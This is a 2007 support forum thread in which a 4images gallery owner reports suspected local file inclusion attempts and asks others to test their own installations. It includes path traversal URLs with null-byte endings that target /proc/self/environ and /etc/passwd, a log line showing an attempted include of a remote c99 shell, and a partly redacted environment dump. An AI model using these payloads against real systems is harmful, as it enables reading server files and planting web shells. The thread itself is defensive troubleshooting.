Author Topic: [Secutity] Security hole testing...please read  (Read 17820 times)

0 Members and 1 Guest are viewing this topic.

Offline MadSci

  • Full Member
  • ***
  • Posts: 102
    • View Profile
[Secutity] Security hole testing...please read
« on: November 07, 2007, 12:04:59 AM »
This was executed remotely:

/index.php?template=../../../../../../proc/self/environ%00

it lists some info about the server hosting the database

ms
« Last Edit: November 16, 2007, 07:41:29 PM by MadSci »

Offline thunderstrike

  • 4images Guru
  • *******
  • Posts: 2.327
    • View Profile
Re: [Secutity] Shoud i be conserned ?
« Reply #1 on: November 07, 2007, 12:25:51 AM »
What is web error log say ?
8 steps need when ask question -

- PHP version (ACP - > phpinfo())
- mySQL version (ACP - > phpinfo())
- 4images version
- Post screenshot / URL
- Post code in BB Code (no need full file for code) or post attach file
- It doesn't work. What is say - what is do for no work
- Install MOD ? If so - please say (troubleshooting)
- Read FAQ ? Install Bug fixes ?

Offline MadSci

  • Full Member
  • ***
  • Posts: 102
    • View Profile
Re: [Secutity] Shoud i be conserned ?
« Reply #2 on: November 07, 2007, 01:07:17 AM »
PHP Warning:  main() [<a href='function.include'>function.include</a>]: Failed opening '' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php:/usr/local/lib/php/PEAR') in htp://speakerformula.com/forum/c99.txt? on line 1

c99 is shell crap

ms

ps do not click the link it has a virus

Offline thunderstrike

  • 4images Guru
  • *******
  • Posts: 2.327
    • View Profile
Re: [Secutity] Shoud i be conserned ?
« Reply #3 on: November 07, 2007, 01:17:27 AM »
Is come from PHP PEAR script ... you no use PHP PEAR for programming ? If no ... report this to host if link is virus.
8 steps need when ask question -

- PHP version (ACP - > phpinfo())
- mySQL version (ACP - > phpinfo())
- 4images version
- Post screenshot / URL
- Post code in BB Code (no need full file for code) or post attach file
- It doesn't work. What is say - what is do for no work
- Install MOD ? If so - please say (troubleshooting)
- Read FAQ ? Install Bug fixes ?

Offline MadSci

  • Full Member
  • ***
  • Posts: 102
    • View Profile
Re: [Secutity] Shoud i be conserned ?
« Reply #4 on: November 07, 2007, 01:56:24 AM »

Offline thunderstrike

  • 4images Guru
  • *******
  • Posts: 2.327
    • View Profile
Re: [Secutity] Shoud i be conserned ?
« Reply #5 on: November 07, 2007, 02:13:56 AM »
Hum ... I no can reproduce ... you install MOD ?
8 steps need when ask question -

- PHP version (ACP - > phpinfo())
- mySQL version (ACP - > phpinfo())
- 4images version
- Post screenshot / URL
- Post code in BB Code (no need full file for code) or post attach file
- It doesn't work. What is say - what is do for no work
- Install MOD ? If so - please say (troubleshooting)
- Read FAQ ? Install Bug fixes ?

Offline MadSci

  • Full Member
  • ***
  • Posts: 102
    • View Profile
Re: [Secutity] Shoud i be conserned ?
« Reply #6 on: November 07, 2007, 02:44:58 AM »
realy I have 1.7.4 installed fresh no issues so far..and I dont see any C99 shell scripts or unusual files...here is what I get:

PATH=/usr/local/bin:/usr/bin:/bin�DOCUMENT_ROOT=/home/usr/public_html
�HTTP_ACCEPT=text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
�HTTP_ACCEPT_CHARSET=windows-1252,utf-8;q=0.7,*;q=0.7
�HTTP_ACCEPT_ENCODING=gzip,deflate
�HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5
�HTTP_CONNECTION=keep-alive
�HTTP_COOKIE=4images_lastvisit=1194399643; 4images_userid=-1; sessionid=bf0ab967af825fe368edf0d; PHPSESSID=73bde90b5fbe06062efec8
�HTTP_HOST=www.blahblah.com
�HTTP_KEEP_ALIVE=300
�HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9
�REMOTE_ADDR=my ip�REMOTE_PORT=2258�SCRIPT_FILENAME=/home/usr/public_html/db/index.php
�SERVER_ADDR=67.15.�SERVER_ADMIN=webmaster@4images.com�SERVER_NAME=www.blah.com
�SERVER_PORT=80�SERVER_SOFTWARE=Apache�GATEWAY_INTERFACE=CGI/1.1�SERVER_PROTOCOL=HTTP/1.1�REQUEST_METHOD=GET
�QUERY_STRING=template=../../../../../../proc/self/environ%00�REQUEST_URI=/db/index.php?template=../../../../../../proc/self/environ%00�SCRIPT_NAME=/db/index.php

some info was changed to preserve security

Offline kai

  • Administrator
  • Addicted member
  • *****
  • Posts: 1.423
    • View Profile
    • 4images - Image Gallery Management System
Re: [Secutity] Shoud i be conserned ?
« Reply #7 on: November 07, 2007, 09:38:37 AM »
Hi MadSci,

I can't reproduce it.
Please check PN.

thanks,
Kai
Your first three "must do" before you ask a question:
1. Forum rules
2. FAQ
3. Search

Offline MadSci

  • Full Member
  • ***
  • Posts: 102
    • View Profile
Re: [Secutity] Shoud i be conserned ?
« Reply #8 on: November 07, 2007, 07:22:38 PM »
did u get the same thing ?

whats the verdict guys..how serious is it ?

ms

Offline kai

  • Administrator
  • Addicted member
  • *****
  • Posts: 1.423
    • View Profile
    • 4images - Image Gallery Management System
Re: [Secutity] Shoud i be conserned ?
« Reply #9 on: November 07, 2007, 07:45:28 PM »
No problem here:
http://demo.4homepages.de/index.php?template=../../../../../../proc/self/environ%00


Which modifications do you have installed?
Your first three "must do" before you ask a question:
1. Forum rules
2. FAQ
3. Search

Offline MadSci

  • Full Member
  • ***
  • Posts: 102
    • View Profile
Re: [Secutity] Shoud i be conserned ?
« Reply #10 on: November 07, 2007, 10:14:26 PM »
What I did is:

1. installed seccond copy of 4images 1.7.4 on my server.
2. from the old 4images I copy the skin and the media folder
3. I logged in the new 4images and just restored the database and the skin..
no additional MODs installed...or anything...

for the past 2 months Ive seen increased attempts to run C99 shell scripts. The most hits are coming from veloxzone.com.br site..they always try :

index.php?template=site which has c99 shel or other trojan..
it never worked this is the only one which manage to run environ command which is unuasual..the hit came from south africa I guess proxy.

ms

Offline kai

  • Administrator
  • Addicted member
  • *****
  • Posts: 1.423
    • View Profile
    • 4images - Image Gallery Management System
Re: [Secutity] Shoud i be conserned ?
« Reply #11 on: November 07, 2007, 10:22:51 PM »
Perhaps it's a wrong configured webserver.
Your first three "must do" before you ask a question:
1. Forum rules
2. FAQ
3. Search

Offline thunderstrike

  • 4images Guru
  • *******
  • Posts: 2.327
    • View Profile
Re: [Secutity] Shoud i be conserned ?
« Reply #12 on: November 07, 2007, 10:28:53 PM »
Is come from PHP PEAR script ... you no use PHP PEAR for programming ? If no ... report this to host if link is virus.

I say here ... report to host for question.
8 steps need when ask question -

- PHP version (ACP - > phpinfo())
- mySQL version (ACP - > phpinfo())
- 4images version
- Post screenshot / URL
- Post code in BB Code (no need full file for code) or post attach file
- It doesn't work. What is say - what is do for no work
- Install MOD ? If so - please say (troubleshooting)
- Read FAQ ? Install Bug fixes ?

Offline MadSci

  • Full Member
  • ***
  • Posts: 102
    • View Profile
Re: [Secutity] Shoud i be conserned ?
« Reply #13 on: November 16, 2007, 07:40:53 PM »
Hey Guys,
could you please execute this links on your server and report  if anything unusual:

Code: [Select]
http://www.yourdomain.com/4images_dir/index.php?template=/../../../../../../../etc/passwd%00

http://www.yourdomain.com/4images_dir/index.php?template=/../../../../../../../etc/group%00

http://www.yourdomain.com/4images_dir/index.php?template=/../../../../../../../etc/hosts%00

http://www.yourdomain.com/4images_dir/index.php?template=/../../../../../../../etc/services%00

http://www.yourdomain.com/4images_dir/index.php?template=/../../../../../../../etc/syslog.conf%00

replace: yourdomain.com and the 4images_dir with your own domain name and directory



This links were security hole for my site which was disabled by the host until we figure this out. Unfortunately so far this is the first report of such activity so before we label it as hole we need to see if somebody else have the same problem. If not then I will reinstall and rebuild my site from scratch...

thanx I really appreciate the help

ms

Offline Nicky

  • Administrator
  • 4images Guru
  • *****
  • Posts: 3.195
    • View Profile
Re: [Secutity] Security hole testing...please read
« Reply #14 on: November 16, 2007, 08:46:10 PM »
no effect
not on my server http://www.nicky.net/4test/
not on http://demo.4homepages.de/ server
cheers
Nicky
Your first three "must do" before you ask a question ! (© by V@no)
- please read the Forum Rules ...
- please study the FAQ ...
- please try to Search for your answer ...

nicky.net 4 4images
Signature stolen from mawenzi